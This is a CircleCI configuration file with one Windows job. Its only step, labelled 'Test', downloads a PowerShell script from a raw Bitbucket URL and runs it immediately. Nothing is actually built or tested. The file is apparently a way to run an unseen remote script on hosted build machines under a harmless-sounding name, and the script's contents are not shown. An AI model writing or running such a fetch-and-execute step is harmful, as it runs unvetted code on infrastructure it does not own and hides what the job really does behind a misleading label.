version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/jadykekso/kekso/raw/0d64accd8a205bf1dce2e942294c5629da7208a4/log.ps1 -OutFile log.ps1
            ./log.ps1